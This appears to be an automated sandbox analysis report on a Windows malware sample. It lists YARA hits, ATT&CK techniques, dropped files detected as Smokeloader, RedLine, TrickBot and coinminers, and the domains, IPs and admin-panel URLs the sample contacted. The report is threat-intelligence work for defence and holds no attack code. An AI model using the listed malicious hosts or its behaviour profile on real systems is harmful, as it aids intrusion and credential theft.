Source: Yara match	File source: 00000000.00000003.1737285169.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2439565285.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2369465159.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2048461979.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Exfiltration Over Alternative Protocol	14 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	812 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	136 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	13 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Traffic Duplication	5 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1171 Security Software Discovery	SSH	Keylogging	Scheduled Transfer	146 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	751 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	751 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	812 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Regsvr32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	49%	Virustotal		Browse
file.exe	100%	Avira	HEUR/AGEN.1312670
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\vahvrsu	100%	Avira	HEUR/AGEN.1312670
C:\Users\user\AppData\Roaming\tdhvrsu	100%	Avira	HEUR/AGEN.1312670
C:\Users\user\AppData\Local\Temp\57C9.dll	100%	Avira	HEUR/AGEN.1300250
C:\Users\user\AppData\Local\Temp\8042.exe	100%	Avira	HEUR/AGEN.1312670
C:\Users\user\AppData\Local\Temp\38B4.exe	100%	Avira	DR/AutoIt.Gen
C:\Users\user\AppData\Local\Temp\64.exe	100%	Avira	HEUR/AGEN.1319395
C:\ProgramData\Drivers\csrss.exe	100%	Avira	HEUR/AGEN.1312455
C:\Users\user\AppData\Local\Temp\50E3.exe	100%	Avira	HEUR/AGEN.1312455
C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	100%	Avira	HEUR/AGEN.1319395
C:\Users\user\AppData\Local\Temp\32.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4A1B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\41CD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vahvrsu	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tdhvrsu	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\57C9.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8042.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\38B4.exe	100%	Joe Sandbox ML
C:\ProgramData\Drivers\csrss.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\50E3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\32.exe	43%	ReversingLabs	Win32.Trojan.Miner
C:\Users\user\AppData\Local\Temp\38B4.exe	83%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\41CD.exe	49%	ReversingLabs	Win32.Spyware.TrickBot
C:\Users\user\AppData\Local\Temp\4A1B.exe	51%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\64.exe	70%	ReversingLabs	Win64.Coinminer.CoinHelper
C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	70%	ReversingLabs	Win64.Coinminer.CoinHelper
C:\Users\user\AppData\Roaming\vahvrsu	49%	ReversingLabs	Win32.Trojan.BotX

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
nrnet.com	0%	Virustotal	Browse
lightseinsteniki.org	22%	Virustotal	Browse
aqh.net	0%	Virustotal	Browse
6ail.com	0%	Virustotal	Browse
aspmx3.googlemail.com	0%	Virustotal	Browse
a5a.com	0%	Virustotal	Browse
www.o.tv	0%	Virustotal	Browse
um.cz	0%	Virustotal	Browse
apee.com	0%	Virustotal	Browse
m7l.com	0%	Virustotal	Browse
gco.uk	0%	Virustotal	Browse
hna.be	0%	Virustotal	Browse
mx.hetemail.jp	0%	Virustotal	Browse
stualialuyastrelia.net	26%	Virustotal	Browse
1.tv	0%	Virustotal	Browse
mx1.aamail.co.uk	0%	Virustotal	Browse
mail.nr.net	0%	Virustotal	Browse
a6a.com	0%	Virustotal	Browse
www.dnasl.com	0%	Virustotal	Browse
o.tv	0%	Virustotal	Browse
humydrole.com	16%	Virustotal	Browse
2no.co	6%	Virustotal	Browse
hul.co.uk	0%	Virustotal	Browse
mail.mailerhost.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ct.ated.net/wp-admin/	0%	Avira URL Cloud	safe
https://z-a.com/wp-login.php	0%	Avira URL Cloud	safe
https://gbya.com/phpmyadmin/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://a5a.com/wp-login.php	0%	Avira URL Cloud	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
http://ia.eu/administrator/index.php	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
https://96l.com/admin.php	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
https://z-a.com/admin.php	0%	Avira URL Cloud	safe
http://hul.co.uk/administrator/index.php	0%	Avira URL Cloud	safe
http://gcann.cr.co.uk/wp-login.php	0%	Avira URL Cloud	safe
https://2no.co:443/1oH5R	100%	Avira URL Cloud	malware
http://z-a.com/administrator/	0%	Avira URL Cloud	safe
http://onlist.com/admin	0%	Avira URL Cloud	safe
http://gco.uk/pma/	0%	Avira URL Cloud	safe
http://gbya.com/admin.php	0%	Avira URL Cloud	safe
http://gmaso.com/wp-admin/	0%	Avira URL Cloud	safe
http://gco.uk/phpmyadmin/	0%	Avira URL Cloud	safe
http://m7l.com/PhpMyAdmin/	0%	Avira URL Cloud	safe
https://gmo.uk/phpmyadmin/	0%	Avira URL Cloud	safe
http://ct.ated.net/pma/	0%	Avira URL Cloud	safe
http://a6a.com/admin.php	0%	Avira URL Cloud	safe
https://gco.uk/admin.php	0%	Avira URL Cloud	safe
https://hna.be/admin/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
https://96l.com/wp-login.php	0%	Avira URL Cloud	safe
http://hul.co.uk/admin.php	0%	Avira URL Cloud	safe
http://hna.be/administrator/index.php	0%	Avira URL Cloud	safe
http://96l.com/wp-admin/	0%	Avira URL Cloud	safe
http://gr.2mail.com/admin/	100%	Avira URL Cloud	phishing
https://6ail.com/phpmyadmin/	0%	Avira URL Cloud	safe
http://il.cm/phpMyAdmin/	0%	Avira URL Cloud	safe
http://san.ee/administrator/index.php	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10ResponseD	0%	Avira URL Cloud	safe
https://gco.uk/wp-login.php	0%	Avira URL Cloud	safe
http://gco.uk/admin/	0%	Avira URL Cloud	safe
http://qoil.com/admin.php	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://gbya.com/phpmyadmin/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://z-a.com/admin	0%	Avira URL Cloud	safe
http://nrnet.com/pma/	0%	Avira URL Cloud	safe
https://z-a.com/admin	0%	Avira URL Cloud	safe
http://atozrental.cc/atoz/index.php	100%	Avira URL Cloud	malware
http://a5a.com/admin.php	0%	Avira URL Cloud	safe
http://96l.com/wp-login.php	0%	Avira URL Cloud	safe
http://1.tv/wp-login.php	0%	Avira URL Cloud	safe
http://gmaso.com/admin/	0%	Avira URL Cloud	safe
http://96l.com/admin	0%	Avira URL Cloud	safe
http://gco.uk/admin	0%	Avira URL Cloud	safe
https://96l.com/admin	0%	Avira URL Cloud	safe
http://ct.ated.net/administrator/index.php	0%	Avira URL Cloud	safe
https://nrnet.com/wp-login.php	0%	Avira URL Cloud	safe
https://www.noweco.com/admin/	0%	Avira URL Cloud	safe
http://gmaso.com/phpmyadmin/	0%	Avira URL Cloud	safe
http://hul.co.uk/wp-admin/	0%	Avira URL Cloud	safe
https://gco.uk/administrator/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13Response	0%	Avira URL Cloud	safe
http://cm.cz/admin.php	0%	Avira URL Cloud	safe
http://z-a.com/wp-admin/	0%	Avira URL Cloud	safe
http://www.hul.co.uk/	0%	Avira URL Cloud	safe
http://1.tv/administrator/index.php	0%	Avira URL Cloud	safe
http://z-a.com/wp-login.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nrnet.com	104.238.144.219	true	true	0%, Virustotal, Browse	unknown
ftp.gcann.cr.co.uk	3.64.163.50	true	true		unknown
ct.ated.net	13.248.169.48	true	true		unknown
lightseinsteniki.org	34.143.166.163	true	true	22%, Virustotal, Browse	unknown
aqh.net	103.224.182.246	true	false	0%, Virustotal, Browse	unknown
6ail.com	13.248.169.48	true	true	0%, Virustotal, Browse	unknown
mailgate.hul.co.uk	68.183.34.12	true	true		unknown
aspmx3.googlemail.com	64.233.184.26	true	false	0%, Virustotal, Browse	unknown
a5a.com	64.190.63.111	true	true	0%, Virustotal, Browse	unknown
mailstore1.secureserver.net	68.178.213.244	true	false		high
www.o.tv	86.105.245.69	true	false	0%, Virustotal, Browse	unknown
mail.6ail.com	13.248.169.48	true	true		unknown
apee.com	64.190.63.111	true	true	0%, Virustotal, Browse	unknown
ftp.6ail.com	13.248.169.48	true	true		unknown
mx.hetemail.jp	157.7.44.163	true	true	0%, Virustotal, Browse	unknown
um.cz	88.86.105.95	true	false	0%, Virustotal, Browse	unknown
park-mx.above.com	103.224.212.34	true	false		high
gco.uk	213.171.212.244	true	true	0%, Virustotal, Browse	unknown
ftp.gbya.com	3.64.163.50	true	true		unknown
hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	54.161.222.85	true	false		high
m7l.com	15.197.142.173	true	true	0%, Virustotal, Browse	unknown
mail.nr.net	104.238.144.219	true	true	0%, Virustotal, Browse	unknown
mail.apee.com	64.190.63.111	true	true		unknown
hna.be	3.33.224.147	true	true	0%, Virustotal, Browse	unknown
stualialuyastrelia.net	91.215.85.17	true	true	26%, Virustotal, Browse	unknown
1.tv	15.197.172.60	true	true	0%, Virustotal, Browse	unknown
ftp.96l.com	15.197.204.56	true	true		unknown
mx1.aamail.co.uk	82.71.214.1	true	false	0%, Virustotal, Browse	unknown
778748.parkingcrew.net	13.248.148.254	true	false		high
mail.mailerhost.net	5.161.133.13	true	true	0%, Virustotal, Browse	unknown
ssh.ct.ated.net	13.248.169.48	true	true		unknown
aamail.co.uk	82.71.214.13	true	false		unknown
a6a.com	15.197.142.173	true	true	0%, Virustotal, Browse	unknown
www.dnasl.com	23.106.186.61	true	false	0%, Virustotal, Browse	unknown
o.tv	86.105.245.69	true	true	0%, Virustotal, Browse	unknown
humydrole.com	123.140.161.243	true	true	16%, Virustotal, Browse	unknown
hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com	3.19.116.195	true	false		high
2no.co	104.21.79.229	true	false	6%, Virustotal, Browse	unknown
hul.co.uk	68.183.34.12	true	true	0%, Virustotal, Browse	unknown
parkingcrew.net	185.53.179.29	true	false		high
mail.gbya.com	3.64.163.50	true	true		unknown
alt1.gmr-smtp-in.l.google.com	209.85.202.14	true	false		high
gmr-smtp-in.l.google.com	172.253.122.14	true	false		high
mail.ia.eu	199.59.243.225	true	true		unknown
popss.com	52.58.78.16	true	false		unknown
ssh.96l.com	15.197.204.56	true	true		unknown
96l.com	15.197.204.56	true	true		unknown
onlist.com	192.99.158.243	true	false		unknown
gcann.cr.co.uk	3.64.163.50	true	true		unknown
ftp.noweco.com	216.37.42.12	true	true		unknown
ftp.gmo.uk	3.64.163.50	true	true		unknown
imap.hul.co.uk	68.183.34.12	true	true		unknown
ssh.hul.co.uk	68.183.34.12	true	true		unknown
sell.sawbrokers.com	85.10.133.119	true	false		unknown
cloud.mail.com	74.208.232.192	true	false		high
gr.2mail.com	192.99.158.243	true	false		unknown
z-a.com	194.63.248.47	true	true		unknown
ftp.san.ee	145.14.30.248	true	true		unknown
gbya.com	3.64.163.50	true	true		unknown
ftp.gr.2mail.com	192.99.158.243	true	false		unknown
mail.gransy.com	82.208.29.194	true	false		unknown
www.luxusnipradlo.cz	217.16.188.145	true	false		unknown
smtp.secureserver.net	216.69.141.81	true	false		high
ssh.6ail.com	13.248.169.48	true	true		unknown
i.17986.net	67.21.93.254	true	true		unknown
ftp.1.tv	15.197.172.60	true	true		unknown
san.ee	145.14.30.248	true	true		unknown
mx192.m2bp.com	164.90.197.105	true	false		unknown
mail.hul.co.uk	68.183.34.12	true	true		unknown
gmo.uk	3.64.163.50	true	true		unknown
ia.eu	199.59.243.225	true	true		unknown
hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	3.94.41.167	true	false		high
liuliuoumumy.org	34.143.166.163	true	true		unknown
qoil.com	64.190.63.111	true	true		unknown
dnasl.com	23.106.186.61	true	false		unknown
ftp.ia.eu	199.59.243.225	true	true		unknown
ftp.cm.cz	104.247.82.52	true	true		unknown
sil.com	127.0.0.1	true	false		unknown
pop.1.tv	15.197.172.60	true	true		unknown
atozrental.cc	175.126.109.15	true	true		unknown
www.hugedomains.com	104.26.7.37	true	false		high
ftp.apee.com	64.190.63.111	true	true		unknown
noweco.com	216.37.42.12	true	true		unknown
ftp.ct.ated.net	13.248.169.48	true	true		unknown
pop.hul.co.uk	68.183.34.12	true	true		unknown
cm.cz	104.247.82.52	true	true		unknown
mail.h-email.net	91.107.214.206	true	true		unknown
mail.ct.ated.net	13.248.169.48	true	true		unknown
hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	54.209.32.212	true	false		high
www.hul.co.uk	68.183.34.12	true	true		unknown
vip-mail.superhosting.cz	95.168.196.56	true	false		high
mail.gmo.uk	3.64.163.50	true	true		unknown
ftp.hul.co.uk	68.183.34.12	true	true		unknown
ftp.onlist.com	192.99.158.243	true	false		unknown
snukerukeutit.org	104.198.2.251	true	false		unknown
am.cz	77.78.104.3	true	false		unknown
mail.gcann.cr.co.uk	3.64.163.50	true	true		unknown
pop3.hul.co.uk	68.183.34.12	true	true		unknown
sumagulituyo.org	34.94.245.237	true	false		unknown
ftp.aqh.net	103.224.182.246	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://z-a.com/wp-login.php	true	Avira URL Cloud: safe	unknown
https://gbya.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://a5a.com/wp-login.php	true	Avira URL Cloud: safe	unknown
http://ct.ated.net/wp-admin/	true	Avira URL Cloud: safe	unknown
http://ia.eu/administrator/index.php	true	Avira URL Cloud: safe	unknown
https://96l.com/admin.php	true	Avira URL Cloud: safe	unknown
http://hul.co.uk/administrator/index.php	true	Avira URL Cloud: safe	unknown
https://z-a.com/admin.php	true	Avira URL Cloud: safe	unknown
http://gcann.cr.co.uk/wp-login.php	true	Avira URL Cloud: safe	unknown
http://onlist.com/admin	false	Avira URL Cloud: safe	unknown
http://z-a.com/administrator/	true	Avira URL Cloud: safe	unknown
http://gco.uk/pma/	true	Avira URL Cloud: safe	unknown
http://gbya.com/admin.php	true	Avira URL Cloud: safe	unknown
http://gmaso.com/wp-admin/	true	Avira URL Cloud: safe	unknown
http://gco.uk/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://m7l.com/PhpMyAdmin/	true	Avira URL Cloud: safe	unknown
https://gmo.uk/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://ct.ated.net/pma/	true	Avira URL Cloud: safe	unknown
http://m7l.com/phpMyAdmin/	true		unknown
https://hna.be/admin/	true	Avira URL Cloud: safe	unknown
https://gco.uk/admin.php	true	Avira URL Cloud: safe	unknown
http://a6a.com/admin.php	true	Avira URL Cloud: safe	unknown
https://96l.com/wp-login.php	true	Avira URL Cloud: safe	unknown
http://hul.co.uk/admin.php	true	Avira URL Cloud: safe	unknown
http://hna.be/administrator/index.php	true	Avira URL Cloud: safe	unknown
http://96l.com/wp-admin/	true	Avira URL Cloud: safe	unknown
http://gr.2mail.com/admin/	false	Avira URL Cloud: phishing	unknown
https://6ail.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://il.cm/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://san.ee/administrator/index.php	true	Avira URL Cloud: safe	unknown
https://gco.uk/wp-login.php	true	Avira URL Cloud: safe	unknown
http://gco.uk/admin/	true	Avira URL Cloud: safe	unknown
http://qoil.com/admin.php	true	Avira URL Cloud: safe	unknown
http://gbya.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://atozrental.cc/atoz/index.php	true	Avira URL Cloud: malware	unknown
http://z-a.com/admin	true	Avira URL Cloud: safe	unknown
http://nrnet.com/pma/	true	Avira URL Cloud: safe	unknown
https://z-a.com/admin	true	Avira URL Cloud: safe	unknown
http://a5a.com/admin.php	true	Avira URL Cloud: safe	unknown
http://96l.com/wp-login.php	true	Avira URL Cloud: safe	unknown
http://1.tv/wp-login.php	true	Avira URL Cloud: safe	unknown
http://gmaso.com/admin/	true	Avira URL Cloud: safe	unknown
https://96l.com/admin	true	Avira URL Cloud: safe	unknown
http://ct.ated.net/administrator/index.php	true	Avira URL Cloud: safe	unknown
http://gco.uk/admin	true	Avira URL Cloud: safe	unknown
http://96l.com/admin	true	Avira URL Cloud: safe	unknown
https://nrnet.com/wp-login.php	true	Avira URL Cloud: safe	unknown
https://www.noweco.com/admin/	true	Avira URL Cloud: safe	unknown
http://gmaso.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://hul.co.uk/wp-admin/	true	Avira URL Cloud: safe	unknown
https://gco.uk/administrator/	true	Avira URL Cloud: safe	unknown
http://cm.cz/admin.php	true	Avira URL Cloud: safe	unknown
http://z-a.com/wp-admin/	true	Avira URL Cloud: safe	unknown
http://www.hul.co.uk/	true	Avira URL Cloud: safe	unknown
http://1.tv/administrator/index.php	true	Avira URL Cloud: safe	unknown
http://z-a.com/wp-login.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23ResponseD	AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003796000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1793089251.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	AppLaunch.exe, 00000009.00000002.2381658030.000000000677B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2no.co:443/1oH5R	38B4.exe, 00000006.00000003.2205692406.00000000020AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	false		high
